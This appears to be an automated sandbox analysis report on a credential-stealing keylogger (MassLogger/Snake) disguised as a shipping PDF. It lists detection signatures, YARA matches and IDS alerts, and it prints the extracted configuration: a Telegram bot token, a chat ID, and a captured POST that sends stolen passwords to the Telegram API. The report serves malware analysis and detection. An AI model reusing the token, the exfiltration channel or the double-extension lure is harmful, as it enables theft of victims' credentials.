Edit tour

Windows Analysis Report
Shipment Document BL,INV and packing list.pdf.exe

Overview

General Information

Sample name:Shipment Document BL,INV and packing list.pdf.exe
Analysis ID:1640472
MD5:5fd799c047c81a8efb15d9a32f1d8e39
SHA1:fe01653460b4435266a8d3a3bdab26def6a9b2f7
SHA256:ffac68d784d7cd99536b0664ff0a765371c8bf0d0836fce71fa8a29afa9cb5c3
Infos:

Detection

MSIL Logger, MassLogger RAT
Score:100
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension File Execution
Suricata IDS alerts for network traffic
Yara detected MSIL Logger
Yara detected MassLogger RAT
Yara detected Telegram RAT
Binary is likely a compiled AutoIt script file
Initial sample is a PE file and has a suspicious name
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w7x64
  • Shipment Document BL,INV and packing list.pdf.exe (PID: 3680 cmdline: "C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe" MD5: 5FD799C047C81A8EFB15D9A32F1D8E39)
    • RegSvcs.exe (PID: 3720 cmdline: "C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe" MD5: 19855C0DC5BEC9FDF925307C57F9F5FC)
  • cleanup
{
  "C2 url": "https://api.telegram.org/bot7686228576:AAFCRREYytnmTaqdF-c37qTodNKZZxoFsFg/sendMessage"
}
{
  "EXfil Mode": "Telegram",
  "Telegram Token": "7686228576:AAFCRREYytnmTaqdF-c37qTodNKZZxoFsFg",
  "Telegram Chatid": "7632407857"
}
SourceRuleDescriptionAuthorStrings
00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_MSILLoggerYara detected MSIL LoggerJoe Security
        00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0xefb7:$a1: get_encryptedPassword
          • 0xf2df:$a2: get_encryptedUsername
          • 0xed52:$a3: get_timePasswordChanged
          • 0xee73:$a4: get_passwordField
          • 0xefcd:$a5: set_encryptedPassword
          • 0x10929:$a7: get_logins
          • 0x105da:$a8: GetOutlookPasswords
          • 0x103cc:$a9: StartKeylogger
          • 0x10879:$a10: KeyLoggerEventArgs
          • 0x10429:$a11: KeyLoggerEventArgsEventHandler
          Click to see the 19 entries

          System Summary

          barindex
          Source: Process startedAuthor: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe", CommandLine: "C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe", CommandLine|base64offset|contains: ., Image: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe, NewProcessName: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe, OriginalFileName: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: "C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe", ProcessId: 3680, ProcessName: Shipment Document BL,INV and packing list.pdf.exe
          Source: DNS queryAuthor: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, QueryName: checkip.dyndns.org
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-03-17T11:09:46.968357+010020577441Malware Command and Control Activity Detected192.168.2.2249163149.154.167.220443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-03-17T11:09:40.070606+010028032742Potentially Bad Traffic192.168.2.2249161132.226.247.7380TCP
          2025-03-17T11:09:46.217032+010028032742Potentially Bad Traffic192.168.2.2249161132.226.247.7380TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-03-17T11:09:46.712421+010018100081Potentially Bad Traffic192.168.2.2249163149.154.167.220443TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7686228576:AAFCRREYytnmTaqdF-c37qTodNKZZxoFsFg", "Telegram Chatid": "7632407857"}
          Source: RegSvcs.exe.3720.2.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7686228576:AAFCRREYytnmTaqdF-c37qTodNKZZxoFsFg/sendMessage"}
          Source: Shipment Document BL,INV and packing list.pdf.exeReversingLabs: Detection: 50%
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability

          Location Tracking

          barindex
          Source: unknownDNS query: name: reallyfreegeoip.org
          Source: Shipment Document BL,INV and packing list.pdf.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.22:49162 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49163 version: TLS 1.2
          Source: Binary string: wntdll.pdb source: Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000003.355434952.0000000002A90000.00000004.00001000.00020000.00000000.sdmp, Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000003.356665790.0000000002BF0000.00000004.00001000.00020000.00000000.sdmp

          Networking

          barindex
          Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.22:49163 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.22:49163 -> 149.154.167.220:443
          Source: unknownDNS query: name: api.telegram.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot7686228576:AAFCRREYytnmTaqdF-c37qTodNKZZxoFsFg/sendDocument?chat_id=7632407857&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd651a7455f1eaHost: api.telegram.orgContent-Length: 1089Connection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
          Source: Joe Sandbox ViewIP Address: 104.21.112.1 104.21.112.1
          Source: Joe Sandbox ViewIP Address: 104.21.112.1 104.21.112.1
          Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
          Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
          Source: Joe Sandbox ViewJA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: reallyfreegeoip.org
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49161 -> 132.226.247.73:80
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.22:49162 version: TLS 1.0
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
          Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
          Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
          Source: global trafficDNS traffic detected: DNS query: api.telegram.org
          Source: unknownHTTP traffic detected: POST /bot7686228576:AAFCRREYytnmTaqdF-c37qTodNKZZxoFsFg/sendDocument?chat_id=7632407857&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd651a7455f1eaHost: api.telegram.orgContent-Length: 1089Connection: Keep-Alive
          Source: RegSvcs.exe, 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
          Source: RegSvcs.exe, 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.orgX
          Source: RegSvcs.exe, 00000002.00000002.879714743.00000000020A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
          Source: RegSvcs.exe, 00000002.00000002.879714743.00000000020A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.comX
          Source: RegSvcs.exe, 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.879714743.0000000002096000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.879714743.00000000020A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
          Source: RegSvcs.exe, 00000002.00000002.879714743.0000000002021000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.879921863.00000000057F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
          Source: RegSvcs.exe, 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.879714743.00000000020A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/X
          Source: Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
          Source: RegSvcs.exe, 00000002.00000002.879714743.00000000020A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgX
          Source: RegSvcs.exe, 00000002.00000002.879921863.00000000057F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
          Source: RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
          Source: RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
          Source: RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
          Source: RegSvcs.exe, 00000002.00000002.879921863.00000000057F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
          Source: RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
          Source: RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
          Source: RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
          Source: RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
          Source: RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
          Source: RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
          Source: RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
          Source: RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
          Source: RegSvcs.exe, 00000002.00000002.879714743.00000000020BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
          Source: RegSvcs.exe, 00000002.00000002.879714743.00000000020BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.orgX
          Source: RegSvcs.exe, 00000002.00000002.879714743.0000000002021000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
          Source: RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
          Source: RegSvcs.exe, 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
          Source: RegSvcs.exe, 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
          Source: Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
          Source: RegSvcs.exe, 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7686228576:AAFCRREYytnmTaqdF-c37qTodNKZZxoFsFg/sendDocument?chat_id=7632
          Source: RegSvcs.exe, 00000002.00000002.879714743.00000000020A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
          Source: Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.879714743.00000000020A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
          Source: RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.879714743.00000000020A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
          Source: RegSvcs.exe, 00000002.00000002.879714743.00000000020A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189X
          Source: RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
          Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49162 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49162
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49163 version: TLS 1.2

          System Summary

          barindex
          Source: 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: Process Memory Space: Shipment Document BL,INV and packing list.pdf.exe PID: 3680, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: Process Memory Space: RegSvcs.exe PID: 3720, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000002.358518900.00000000011A4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_36456399-d
          Source: Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000002.358518900.00000000011A4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_f6eaea43-4
          Source: Shipment Document BL,INV and packing list.pdf.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_bc045e3a-7
          Source: Shipment Document BL,INV and packing list.pdf.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_ec850c34-a
          Source: initial sampleStatic PE information: Filename: Shipment Document BL,INV and packing list.pdf.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess Stats: CPU usage > 49%
          Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
          Source: Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000003.355085552.0000000002CF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Shipment Document BL,INV and packing list.pdf.exe
          Source: Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000003.355227026.0000000002B6D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Shipment Document BL,INV and packing list.pdf.exe
          Source: Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000002.358453034.0000000000B4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRegSvcs.exeT vs Shipment Document BL,INV and packing list.pdf.exe
          Source: Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs Shipment Document BL,INV and packing list.pdf.exe
          Source: Shipment Document BL,INV and packing list.pdf.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: Process Memory Space: Shipment Document BL,INV and packing list.pdf.exe PID: 3680, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: Process Memory Space: RegSvcs.exe PID: 3720, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/2@5/3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
          Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exeFile created: C:\Users\user\AppData\Local\Temp\aut6E2E.tmpJump to behavior
          Source: Shipment Document BL,INV and packing list.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Shipment Document BL,INV and packing list.pdf.exeReversingLabs: Detection: 50%
          Source: unknownProcess created: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe "C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe"
          Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe"
          Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exeSection loaded: wow64win.dllJump to behavior
          Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exeSection loaded: wow64cpu.dllJump to behavior
          Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exeSection loaded: wsock32.dllJump to behavior
          Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: Shipment Document BL,INV and packing list.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: Shipment Document BL,INV and packing list.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: Shipment Document BL,INV and packing list.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: Shipment Document BL,INV and packing list.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Shipment Document BL,INV and packing list.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: Shipment Document BL,INV and packing list.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
